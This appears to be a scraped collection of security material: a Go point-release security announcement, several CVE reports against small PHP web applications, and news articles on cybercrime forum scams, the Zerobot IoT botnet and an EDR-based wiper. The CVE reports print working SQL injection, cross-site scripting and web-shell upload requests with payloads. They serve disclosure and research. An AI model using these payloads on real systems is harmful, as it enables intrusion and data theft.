On Windows, restricted files can be accessed via os.DirFS and http.Dir. The os.DirFS function and http.Dir type provide access to a tree of files rooted at a given directory. These functions permit access to Windows device files under that root. For example, os.DirFS("C:/tmp").Open("COM1") opens the COM1 device. Both os.DirFS and http.Dir only provide read-only filesystem access. In addition, on Windows, an os.DirFS for the directory (the root of the current drive) can permit a maliciously crafted path to escape from the drive and access any path on the system. With fix applied, the behavior of os.DirFS("") has changed. Previously, an empty root was treated equivalently to "/", so os.DirFS("").Open("tmp") would open the path "/tmp". This now returns an error.

Hello gophers,

We have just released Go versions 1.19.4 and 1.18.9, minor point releases.

These minor releases include 2 security fixes following the security policy:

*   os, net/http: avoid escapes from os.DirFS and http.Dir on Windows
    
    The os.DirFS function and http.Dir type provide access to a tree of files  
    rooted at a given directory. These functions permitted access to Windows  
    device files under that root. For example, os.DirFS("C:/tmp").Open("COM1")  
    would open the COM1 device.  
    Both os.DirFS and http.Dir only provide read-only filesystem access.
    
    In addition, on Windows, an os.DirFS for the directory \(the root of the  
    current drive) can permit a maliciously crafted path to escape from the  
    drive and access any path on the system.
    
    The behavior of os.DirFS("") has changed. Previously, an empty root was  
    treated equivalently to "/", so os.DirFS("").Open("tmp") would open the path "/tmp".  
    This now returns an error.
    
    This is CVE-2022-41720 and Go issue https://go.dev/issue/56694.
    
*   net/http: limit canonical header cache by bytes, not entries
    
    An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.
    
    HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.
    
    This issue is also fixed in golang.org/x/net/http2 vX.Y.Z, for users manually configuring HTTP/2.
    
    Thanks to Josselin Costanzi for reporting this issue.
    
    This is CVE-2022-41717 and Go issue https://go.dev/issue/56350.
    

View the release notes for more information:  
https://go.dev/doc/devel/release#go1.19.4

You can download binary and source distributions from the Go website:  
https://go.dev/dl/

To compile from source using a Git clone, update to the release with  
git checkout go1.19.4 and build as usual.

Thanks to everyone who contributed to the releases.

Cheers,  
Jenny and Michael for the Go team

CVE-2022-41720: [security] Go 1.19.4 and Go 1.18.9 are released

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/view_service&id=.

Permalink

Cannot retrieve contributors at this time

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: ep0ch

Login account: admin/admin123 (SuperAdmin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php 8.1 version

Vulnerability File: /php-sms/admin/services/view\_service.php

Vulnerability location: /php-sms/admin/?page=services/view\_service&id=

Vulnerability Parameter: id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=services/view\_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+

exp:

    GET /php-sms/admin/?page=services/view_service&id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
    Host: 192.168.1.88
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
    Connection: close

CVE-2022-44393: vul_report/SQLi-1.md at main · Serces-X/vul_report

An issue was discovered in ZZCMS 2022. There is a cross-site scripting (XSS) vulnerability in admin/ad_list.php.

**ZZCMS the lastest version download page :**

http://www.zzcms.net/about/download.html

software link: http://www.zzcms.net/download/zzcms2022.zip

**Environmental requirements**

PHP version > = 4.3.0

Mysql version>=4.0.0

**Essential information**

version:2022  
File path:admin/ad\_list.php  
parameter:page  
request method:REQUEST  
payload:1");alert(/xss/);("

**Principle analysis**

admin/ad\_list.php line 17  
Get the parameter(page) through the REQUEST method and pass the parameter to the checkid () function.

inc/function.global.php line 14  
Let's see the checkid () function again. The content of the ID parameter comes from the page parameter obtained by the request method. The function first determines whether the ​ID is a number. If it is not a number, it executes the showmsg() function and passes the $ID to the showmsg() function.

inc/function.php line 23  
See the showmsg() function, in which line 24, you can execute malicious code by closing the alert() function  
for example：payload=");alert("1");("

**Loophole recurrence**

First log in to the website：http://localhost/admin/login.php

Access:http://localhost/admin/ad_list.php?page= ");alert(/xss/) ;(", and then two pop-up windows will pop up. The second pop-up content is the detection content.

CVE-2022-44361: ZZCMS2022 has a xss · Issue #1 · cri1stur/ZZcms

Due to improper sanitization of user input on Windows, the static file handler allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read.

*   Why Go 
    *   Common problems companies solve with Go
        
    *   Stories about how and why companies use Go
        
    *   How Go can help keep you secure by default
        
*   Learn
*   Docs 
    *   Tips for writing clear, performant, and idiomatic Go code
        
    *   A complete introduction to building software with Go
        
    *   Reference documentation for Go's standard library
        
    *   Learn what's new in each Go release
        
*   Packages
*   Community 
    *   Videos from prior events
        
    *   Meet other local Go developers
        
    *   Learn and network with Go developers from around the world
        
    *   The Go project's official blog.
        
    *   Get help and stay informed from Go
        
    *   Get connected

CVE-2020-36565: GO-2021-0051 - Go Packages

On cybercrime forums, user complaints about being duped may accidentally expose their real identities.

Nobody is immune to being scammed online—not even the people running the scams. Cybercriminals using hacking forums to buy software exploits and stolen login details keep falling for cons and are getting ripped off thousands of dollars at a time, a new analysis has revealed. And what’s more, when the criminals complain that they are being scammed, they’re also leaving a trail of breadcrumbs of their own personal information that could reveal their real-world identities to police and investigators.

Hackers and cybercriminals often gather on specific forums and marketplaces to do business with each other. They can advertise upcoming work they need help with, sell databases of people’s stolen passwords and credit card information, or tout new security vulnerabilities that can be used to break into people’s devices or systems. However, these deals often don’t go to plan.

The new research, published today by cybersecurity firm Sophos, examines these failed transactions and the complaints people have made about them. “Scammers scamming scammers on criminal forums and marketplaces is much bigger than we originally thought it was,” says Matt Wixey, a researcher with Sophos X-Ops who studied the marketplaces.

Wixey examined three of the most prominent cybercrime forums: the Russian-language forums Exploit and XSS, plus the English-language BreachForums, which replaced RaidForums when it was seized by US law enforcement in April. While the sites operate in slightly different ways, they all have “arbitration” rooms where people who think they’ve been scammed or wronged by other criminals can complain. For instance, if someone purchases malware and it doesn’t work, they may moan to the site’s administrators.

The complaints sometimes lead to people getting their money back, but more often act as a warning for other users, Wixey says. In the past 12 months—the period the research covers—criminals on the forums have lost more than $2.5 million to other scammers, the analysis says. Some people complain about losing as little as $2, while the median scams on each of the sites ranges from $200 to $600, according to the research, which is being presented at the BlackHat Europe security conference.

The scams come in multiple forms. Some are simple, others are more sophisticated. Frequently, there are “rip-and-run” scams, Wixey says, where the buyer doesn’t pay for what they’ve received or the seller gets the money but doesn’t send across what they sold. (These are often known as “rippers.”) Other types of scams involve faked data or security exploits that don’t work: One person on BreachForums claimed a seller tried to send them Facebook data that was already public.

In one extreme incident on the Exploit forum, an account posted a lengthy complaint that they had provided someone with a Windows kernel exploit and hadn’t been paid the $130,000 they had agreed for it. The buyer said they would pay once they had tested the software but never stumped up the cash. “At each stage, he gave different excuses for delaying the payment,” a translated version of the complaint says. 

In some scams, multiple accounts or people appeared to work together, the research says. A user with a good reputation can introduce one person to another. This accomplice then directs the victim to a scam website. In one instance, Wixey says, a user wanted to buy a fake copy of the NFT-focused game _Axie Infinity_. “They wanted a fake copy of it with the intent of basically siphoning off legitimate user’s funds,” Wixey says. “They bought this fake copy from someone else, and the fake copy contained a backdoor which then stole the stolen cryptocurrency.” The scammer was essentially being scammed through their own scam.

While it shouldn’t be a surprise that criminals often try to con each other—there’s no honor among cybercriminals, after all—the research shows how prevalent it is. In 2017, security firm Digital Shadows pointed out a database that had been created to name and shame known rippers. Similarly, in 2021, the firm found that some administrators on cybercrime forums are scamming their own customers. In the past decade, there have been thousands of complaints about criminals scamming each other, according to threat intelligence firm Analyst1. Meanwhile, a previous analysis from TrendMicro concluded that while forums and marketplaces have rules, they don’t deter scammers. “The perpetrators are typically those who go for quick profits over reputation,” the firm’s 2019 research says.

Arguably, the most organized scam that Sophos’ Wixey spotted stemmed from an investigation into the Genesis marketplace, which has been online since 2017 and sells hotel login details, cookies, and access to data from compromised systems. When researching Genesis, Sophos discovered a faked version of the website appearing high in Google’s search results. “This is a really bizarre case,” Wixey says. “It was a really basic WordPress template and it asked for money, whereas the real Genesis is invitation only.”

As well as not looking like the official Genesis market, the faked version showed other weird behaviors: It linked out to another cybercrime website, the Bitcoin address people could make payments to changed when someone clicked the copy and paste button on the website, and it was also being advertised on Reddit. These signs, Wixey says, hinted the fake could be a “coordinated” effort. Armed with details from the fake Genesis website—including portions of the text and cryptocurrency addresses—the researchers discovered 20 websites that all appear to be connected and run by the same group or individual. The websites all look the same and were registered between August 2021 and June 2022—eight of them are still live. 

Almost all of these websites, Wixey says, imitate defunct criminal marketplaces and try to get people to pay to access them. The scam appears to work, too. The researcher says the Bitcoin addresses the scam sites pay into have collectively received $132,000, although he is cautious to say the money may all have come from the false websites. Sophos appeared to find one threat user who may be behind the sites—an actor going by the handle “waltcranston.” Among several pieces of information linking the handle to the sites, someone with the username claimed to have created the fake marketplaces on another forum.

Despite not being able to fully confirm that waltcranston is behind the network of fake sites, Wixey says that criminals complaining about being scammed and trying to resolve their disputes through arbitration can be a potential rich source of intelligence for investigators. 

Because those complaining about scams need to post evidence to back up their claims, they often share screenshots containing more personal information than they may have intended. Sophos says it saw a “treasure trove” of data, including cryptocurrency addresses, transaction IDs, email addresses, victims’ names, some malware source code, and other information. All these details may help to uncover more information about the people behind the usernames or provide clues about how they operate.

In one scamming complaint, a user shared a screenshot that showed someone’s Telegram usernames, email addresses, Jabber chat names, plus Skype and Discord usernames. In others, IP addresses and countries where users may be situated are displayed. Screenshots reveal the software people use, as well as the websites they visit and details about their computer setup. In some instances, Wixey saw details of victims that the cybercriminals had targeted.

Criminals, by the nature of what they’re doing, are usually very cautious about sharing anything that may identify them. Real names are not used; they often will use anonymization services such as Tor. “They typically employ pretty good operational security, but with scam reports, that’s not so much the case,” Wixey says. “So much of this stuff is just not available anywhere else on these marketplaces.” Going forward, the data could prove a useful tool for tracking down some of the criminals. “It’s certainly a starting point,” Wixey says.

Scammers Are Scamming Other Scammers Out of Millions of Dollars

The botnet exploits flaws in various routers, firewalls, network-attached storage, webcams, and other products and allows attackers to take over affected systems.

A new botnet is attacking organizations through various vulnerabilities in Internet of Things (IoT) devices from D-Link, Huawei, RealTek, TOTOLink, Zyxel, and more, posing a critical threat that allows attackers to take over vulnerable systems, researchers have found.

The botnet, dubbed Zerobot and written in the Go programming language, includes modules capable of self-replication and self-propagation, as well as attacks for different protocols, a researcher from Fortinet shared in a blog post published Dec. 6.

"Zerobot targets several vulnerabilities to gain access to a device and then downloads a script for further propagation," Fortinet Labs senior antivirus analyst Cara Lin wrote in the post.

So far, researchers have seen two versions of the botnet, one that they began tracking on Nov. 18 and a more sophisticated version that appeared soon after, on Nov. 24, that added a string of new capabilities.

The first version of Zerobot was quite basic, but attackers quickly updated it to include a "selfRepo" module that allows it to reproduce itself and infect more endpoints with different protocols or vulnerabilities, researchers said. The latest version — on which their analysis is based — also includes string obfuscation and a copy file module.

**Attack Mode**

Zerobot initiates an attack by first checking its connection to 1.1.1.1, the DNS resolver server from Cloudflare. It then copies itself onto the targeted device based on the victim's OS type, with different tactics depending on the platform, researchers said.

For Windows, Zerobot copies itself to the "Startup" folder with the filename "FireWall.exe." If the targeted platform is Linux, it has three file paths — "HOME%," "/etc/init/," and "/lib/systemd/system/."

Once it is copied onto the targeted device, Zerobot then sets up an "AntiKill" module to prevent users from disrupting its program once it's started. "This module monitors a particular hex value and uses 'signal.Notify' to intercept any signal sent to terminate or kill the process," Lin wrote.

After initialization, Zerobot starts a connection to its command-and-control (C2) server, ws\[:\]//176\[.\]65\[.\]137\[.\]5/handle, using the WebSocket protocol.

Once it sets up a communication channel, the client waits for a command from the server to unleash any of 21 exploits for various vulnerabilities found in IoT products, as well as some others — including the Java framework vulnerability Spring4Shell, phpAdmin, and F5 Big — "to increase its success rate," Lin wrote.

**Enterprises: Take Immediate Action**

Fortinet included a list of the numerous vulnerabilities that Zerobot exploits, which are found in assorted devices including routers, webcams, network attached storage, firewalls, and other products from a host of well-known manufacturers. 

Lin advised any organization using these devices to update to the latest versions or apply any available patches immediately. Indeed, with businesses losing up to $250 million a year on unwanted botnet attacks, according to a report published last year from Netacea, organizations would be wise to evaluate their environments to discover any device that might be vulnerable to Zerobot, she noted.

"Users should be aware of this new threat, patch any affected systems … running on their network, and actively apply patches as they become available," Lin wrote.

Zerobot Weaponizes Numerous Flaws in Slew of IoT Devices

Microsoft, three others release patches to fix a vulnerability in their respective products that enables such manipulation. Other EDR products potentially are affected as well.

Many trusted endpoint detection and response (EDR) technologies may have a vulnerability in them that gives attackers a way to manipulate the products into erasing virtually any data on installed systems.

Or Yair, a security researcher at SafeBreach who discovered the issue, tested 11 EDR tools from different vendors and found six — from a total of four vendors — were vulnerable. The vulnerable products were Microsoft Windows Defender, Windows Defender for Endpoint, TrendMicro ApexOne, Avast Antivirus, AVG Antivirus, and SentinelOne.

**Formal CVEs and Patches**

Three of the vendors have assigned formal CVE numbers for the bugs and issued patches for them prior to Yair disclosing the issue at the Black Hat Europe conference on Wednesday, Dec 7.

At Black Hat, Yair released proof-of-concept code dubbed Aikido that he developed to demonstrate how a wiper, with just the permissions of an unprivileged user, could manipulate a vulnerable EDR into wiping almost any file on the system, including system files. "We were able to exploit these vulnerabilities in more than 50% of the EDR and AV products we tested, including the default endpoint protection product on Windows," Yair said in a description of his Black Hat talk. "We are lucky to have this discovered prior to real attackers, as these tools and vulnerabilities could have done a lot of damage falling in the wrong hands." He described the wiper as likely being effective against hundreds of millions of endpoints running EDR versions vulnerable to the exploit.

In comments to Dark Reading, Yair says he reported the vulnerability to the affected vendors between July and August. "We then worked closely with them over the next several months on the creation of a fix prior to this publication," he says. "Three of the vendors released new versions of their software or patches to address this vulnerability." He identifies the three vendors as Microsoft, TrendMicro and Gen, the maker of the Avast and AVG products. "As of today, we have not yet received confirmation from SentinelOne about whether they have officially released a fix," he says.

Yair describes the vulnerability as having to do with how some EDR tools delete malicious files. "There are two crucial events in this process of deletion," he says. "There is the time the EDR detects a file as malicious and the time when the file is actually deleted," which sometimes can require a system reboot. Yair says he discovered that between these two events an attacker has the opportunity to use what are known as NTFS junction points to direct the EDR to delete a different file than the one that it identified as malicious.

NTFS junctions points are similar to so-called symbolic links, which are shortcut files to folders and files located elsewhere on a system, except that junctions are used to link directories on different local volumes on a system.

**Triggering the Issue**

Yair says that to trigger the issue on vulnerable systems he first created a malicious file — using the permissions of an unprivileged user — so the EDR would detect and attempt to delete the file. He then found a way to force the EDR to postpone deletion until after reboot, by keeping the malicious file open. His next step was to create a C:\\TEMP\\ directory on the system, make it a junction to a different directory, and rig things so that when the EDR product attempted to delete the malicious file — after reboot — it followed a path to a different file altogether. Yair found he could use the same trick to delete multiple files in different places on a computer by creating one directory shortcut and putting specially crafted paths to targeted files within it, for the EDR product to follow.

Yair says that with some of the tested EDR products, he was not able to do arbitrary file deletion but was able to delete entire folders instead.

The vulnerability affects EDR tools that postpone deletion of malicious files till after a system reboots. In these instances, the EDR product stores the path to the malicious file in some location — that varies by vendor — and uses the path to delete the file after rebooting. Yair says some EDR products don't check if the path to the malicious file leads to the same place after reboot, giving attackers a way to stick a sudden shortcut in the middle of the path. Such vulnerabilities fall into a class known as Time of Check Time of Use (TOCTOU) vulnerabilities, he notes.

Yair says that in most cases, organizations can recover deleted files. So, getting an EDR to delete files on a system by itself, while bad, isn't the worst case. "A deletion is not exactly a wipe," Yair says. To achieve that, Yair designed Aikido so it would overwrite files it had deleted, making them unrecoverable as well.

He says the exploit he developed is an example of an adversary using an opponent's strength against them — just as with the Aikido martial art. Security products, such as EDR tools have super-user rights on systems, and an adversary that is able to abuse them can execute attacks in a virtually undetectable manner. He likens the approach to an adversary turning Israel's famed Iron Dome missile defense system into an attack vector instead.

For Cyberattackers, Popular EDR Tools Can Turn into Destructive Data Wipers

Online Leave Management System v1.0 was discovered to contain an arbitrary file upload vulnerability at /leave_system/classes/SystemSettings.php?f=update_settings. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

vulnerability location：There is an arbitrary file upload vulnerability in the "Settings" module in the background management system

    POST /leave_system/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 4027
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: */*
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTRvq9tuWvBA7y1xY
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/leave_system/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=29pn5i5a8eeab4dp29po24hgn5
    Connection: close
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="name"
    
    Online Leave Management System - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="short_name"
    
    OLMS - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="about_us"
    
    <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer vel pharetra elit. Suspendisse potenti. Quisque aliquam justo ut ipsum porta ullamcorper. Curabitur ac lectus hendrerit, tristique sem in, cursus sapien. Vivamus metus augue, pharetra ac lobortis vel, eleifend sed diam. Sed lacus mauris, dictum eget est in, maximus egestas arcu. Nunc vel est ut est elementum laoreet. Phasellus quis tincidunt ex. Morbi vestibulum molestie turpis, id pellentesque augue viverra in. Donec laoreet lorem id viverra molestie. Vivamus in odio sed lectus ultricies eleifend. Nunc eget erat blandit, tristique odio nec, blandit purus. Vivamus facilisis laoreet ex, vel ultricies nisl molestie in. Proin laoreet finibus nulla quis auctor. Etiam pulvinar ligula et diam tincidunt dapibus.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Nulla pulvinar nisl nec neque mollis imperdiet. Curabitur dignissim convallis arcu, a maximus neque dictum id. Praesent justo libero, semper sed auctor eu, ultricies id quam. Sed et orci non sem imperdiet lobortis at non mi. Suspendisse consectetur consectetur dolor, interdum imperdiet orci venenatis nec. Sed vehicula orci sollicitudin facilisis ultricies. Mauris non nibh nec orci convallis mollis ac in lectus. Cras eu cursus urna, non semper mi. Ut in tortor in odio feugiat interdum. Integer ut ante non purus luctus maximus eu vitae nulla. Nam quam felis, condimentum non molestie sed, ornare at nunc. In rhoncus mi id justo gravida congue.</p>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="img"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="cover"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY--
    
    

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-45009: bug_report/UPLOAD.md at main · realguoxiufeng/bug_report

Simple Phone Book/Directory Web App v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /PhoneBook/edit.php.

**Simple Phone book/directory Web App v1.0 by bakhtiar has SQL injection**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html

Vulnerability File: /PhoneBook/edit.php

GET parameter 'editid' exists SQL injection vulnerability

Payload1: /PhoneBook/edit.php?editid=1'

    GET /PhoneBook/edit.php?editid=1' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

sql statement error

Payload2: /PhoneBook/edit.php?editid=1''

    GET /PhoneBook/edit.php?editid=1'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

Page successfully displayed

Payload3: /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B

    GET /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

The server's response time is 10 seconds

CVE-2022-45010: bug_report/SQLi-1.md at main · realguoxiufeng/bug_report

Online Leave Management System v1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /leave_system/admin/?page=maintenance/department. This vulnerability allows attackers to execute arbitrary web scripts or HTML via crafted payload injected into the Name field under the Create New module.

Permalink

**Online Leave Management System v1.0 by oretnom23 has Stored Cross Site Scripting**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

**Steps to reproduce**

Navigate to Department List "/leave\_system/admin/?page=maintenance/department" and Click "Create New"

Paste the below payload on Name fields and click save

    ab<script>alert(document.cookie)</script>cd
    

Transmission packet

    POST /leave_system/classes/Master.php?f=save_department HTTP/1.1
    Host: localhost
    Content-Length: 371
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: application/json, text/javascript, */*; q=0.01
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQoouFFx1OqtN678U
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/leave_system/admin/?page=maintenance/department
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=reimqvb6otjde4joflmctma8a6
    Connection: close
    
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="id"
    
    
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="name"
    
    ab<script>alert(document.cookie)</script>cd
    ------WebKitFormBoundaryQoouFFx1OqtN678U
    Content-Disposition: form-data; name="description"
    
    abcdef
    ------WebKitFormBoundaryQoouFFx1OqtN678U--
    

Payload will trigger when a user visits on /leave\_system/admin/?page=maintenance/department

Tag

#windows